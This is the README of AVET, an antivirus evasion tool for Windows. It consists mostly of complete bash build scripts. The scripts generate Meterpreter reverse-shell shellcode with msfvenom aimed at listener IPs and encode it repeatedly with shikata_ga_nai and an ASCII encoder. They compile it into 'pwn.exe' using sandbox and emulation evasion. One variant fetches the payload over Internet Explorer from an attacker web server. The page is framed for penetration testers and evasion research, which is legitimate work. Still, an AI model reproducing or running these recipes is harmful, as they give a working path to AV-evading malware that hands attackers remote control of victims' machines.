AVET
AVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques.
What & Why:
- when running an exe file made with msfpayload & co, the exe file will often be recognized by the antivirus software
- avet is an antivirus evasion tool targeting windows machines with executable files
- assembly shellcodes can be used
- make_avet can be used for configuring the source code
- with make_avet you can load ASCII encoded shellcodes from a text file or from a web server, further it is using an av evasion technique to avoid sandboxing and emulation
- for ASCII encoding the shellcode the tool format.sh and sh_format are included
- this readme applies to Kali 2 (64bit) and tdm-gcc
Changelog v2.4.1
– added has_process_exit
– added quick and dirty support for compiling with c++
Installation
git clone https://github.com/govolution/avet.git
./avet_fabric.py
Usage
Compile shellcode into the .exe file and use -F as an evasion technique. Note that this example will work for most antivirus engines. Here -E is used for encoding the shellcode as ASCII.
#!/bin/bash
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion, -E will encode the shellcode as ASCII
./make_avet -f scclean.txt -F -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h
Usage without -E. The ASCII encoder does not have to be used, here is how to compile without -E. In this example, the evasion technique is quite simple! The shellcode is encoded with 20 rounds of shikata-ga-nai, often enough that does the trick. This technique is pretty similar to a junk loop. Execute so much code that the AV engine breaks up execution and let the file pass.
#!/bin/bash
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded 20 rounds with shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86/shikata_ga_nai -i 20 -f c -a x86 --platform Windows > sc.txt
# call make_avet, the sandbox escape is due to the many rounds of decoding the shellcode
./make_avet -f sc.txt
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
echo "" > defs.h
Great to notice that still for 64bit payload no further evasion techniques have to be used. But -F should work here too.
#!/bin/bash
# simple example script for building the .exe file
. build/global_win64.sh
# make meterpreter reverse payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile
./make_avet -f scclean.txt -X -E
$win64_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h
load from a file: Here the ASCII encoder is needed. The executable will load the payload from a text file, which is enough for most AV engines to let the payload execute.
#!/bin/bash
# simple example script for building the .exe file that loads the payload from a given text file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > thepayload.txt && rm sc.txt
# call make_avet, the -l compiles the filename into the .exe file
./make_avet -l thepayload.exe -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
#echo "" > defs.h
# now you can call your programm with pwn.exe, thepayload.txt has to be in the same dir
Load with Internet Explorer: This is a bit tricky and might not work on the first shot. The executable will start Internet Explorer and download the ASCII encoded shellcode. Then the shellcode will be read from the cache directory and if found executed. This was tested with Windows 7 only.
#!/bin/bash
# simple example script for building the .exe file
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.2.105 lport=443 -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile
./make_avet -E -u 192.168.2.105/scclean.txt
$win32_compiler -o pwn.exe avet.c
# cleanup
echo " " > defs.h
# now copy scclean.txt to your web root and start
Copyright (C) govolution
Source: https://github.com/govolution/
